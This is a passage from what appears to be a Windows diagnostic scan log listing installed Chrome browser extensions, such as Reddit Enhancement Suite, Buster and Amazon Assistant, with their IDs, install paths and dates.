Data\Default\Extensions\hlepfoohegkhhmjieoechaddaejaokhf [2020-01-29]
CHR Extension: (Weather) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\iolcbmjhmpdheggkocibajddahbeiglb [2019-12-03]
CHR Extension: (Reddit Enhancement Suite) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2020-01-26]
CHR Extension: (Buster: Captcha Solver for Humans) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\mpbjkejclgfgadiemmefgebjfooflfhl [2019-12-03]
CHR Extension: (Chrome Web Store Payments) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-12-03]
CHR Extension: (Amazon Assistant for Chrome) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\pbjikboenpfhbbejgkoklgkhjpfogcam [2019-12-03]
CHR Extension: (Gmail) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-12-03]
CHR Extension: (Chrome Media Router) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-01-21]
CHR HKLM-x32\...\Chrome\Extension: [dhancbnhabhandieicagelcddkdfgoif] - C:\Program
Files (x86)\Allavsoft\Video Downloader
Converter\extensions\3.22.1.7308\BVDChromeExt.crx [2020-01-21]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]